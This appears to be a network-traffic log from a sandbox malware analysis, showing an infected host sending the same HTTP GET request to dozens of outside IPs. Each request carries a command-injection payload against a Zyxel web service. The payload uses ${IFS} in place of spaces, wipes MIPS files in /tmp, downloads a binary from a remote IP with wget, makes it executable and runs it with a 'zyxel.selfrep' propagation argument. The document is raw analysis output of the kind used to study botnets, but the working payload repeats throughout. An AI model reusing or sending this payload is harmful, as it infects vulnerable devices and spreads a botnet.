                                                Jan 12, 2024 18:24:22.515866041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                959192.168.2.134782247.145.238.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515923977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                960192.168.2.1348806132.204.144.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515959024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                961192.168.2.13435185.97.210.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516011000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                962192.168.2.1350906151.91.60.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516035080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                963192.168.2.1333656186.55.246.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516094923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                964192.168.2.1341352221.146.25.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516119003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                965192.168.2.135185880.152.107.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516151905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                966192.168.2.136064454.6.95.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516180992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                967192.168.2.1334028132.45.114.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516211033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                968192.168.2.1352470163.105.64.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516236067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                969192.168.2.1357370107.23.193.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516267061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                970192.168.2.135041631.206.230.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516310930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                971192.168.2.1355912178.66.101.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516338110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                972192.168.2.13518125.99.67.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516392946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                973192.168.2.135977884.73.196.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516422987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                974192.168.2.1344788125.136.162.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516444921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                975192.168.2.133419618.137.147.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516532898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                976192.168.2.1353750189.19.220.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516537905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                977192.168.2.1347602200.164.158.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516551018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                978192.168.2.1340930177.218.104.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516555071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                979192.168.2.136050680.201.207.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516576052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                980192.168.2.1334226201.28.79.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516653061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                981192.168.2.134737089.232.241.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516679049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                982192.168.2.1339126190.103.241.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516736984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                983192.168.2.133409694.8.84.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516752958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                984192.168.2.13344082.85.216.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516827106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                985192.168.2.134864476.52.29.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516859055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                986192.168.2.1357394172.147.134.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516896009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                987192.168.2.1360330122.255.237.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516936064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                988192.168.2.135698894.95.131.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.516963005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                989192.168.2.1350232181.205.175.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517014027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                990192.168.2.135960671.136.15.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517056942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                991192.168.2.135653690.50.68.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517107964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                992192.168.2.1358270147.116.165.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517157078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                993192.168.2.1338368137.202.162.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517193079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                994192.168.2.1350592166.60.156.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517229080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                995192.168.2.1335582222.62.146.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517261982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                996192.168.2.1351574223.88.227.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517297983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                997192.168.2.1336958167.50.150.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517350912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                998192.168.2.1347612146.98.50.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517417908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                999192.168.2.1342944163.62.57.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517446041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1000192.168.2.1346328100.145.4.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517501116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1001192.168.2.1349382145.126.160.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517546892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1002192.168.2.134015248.207.40.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517580986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1003192.168.2.134980293.115.64.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517627954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1004192.168.2.135083041.5.213.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517635107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1005192.168.2.134148281.59.57.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517702103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1006192.168.2.1360536207.176.176.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517745018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1007192.168.2.135802675.63.157.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517792940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1008192.168.2.134809852.200.3.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517812014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1009192.168.2.1343126185.6.59.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517834902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1010192.168.2.134568061.141.166.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517895937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1011192.168.2.1353040217.237.112.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517925024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1012192.168.2.134254696.43.233.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517956972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1013192.168.2.1352824192.115.42.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.517991066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1014192.168.2.1348802102.169.132.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518033028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1015192.168.2.1337374205.70.138.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518081903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1016192.168.2.134229088.52.26.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518122911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1017192.168.2.133297878.27.36.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518158913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1018192.168.2.1352882144.212.45.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518198967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1019192.168.2.1341868117.203.22.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518254042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1020192.168.2.1341040220.137.25.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518311024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1021192.168.2.1353770162.111.29.25443
                                                TimestampBytes transferredDirectionData
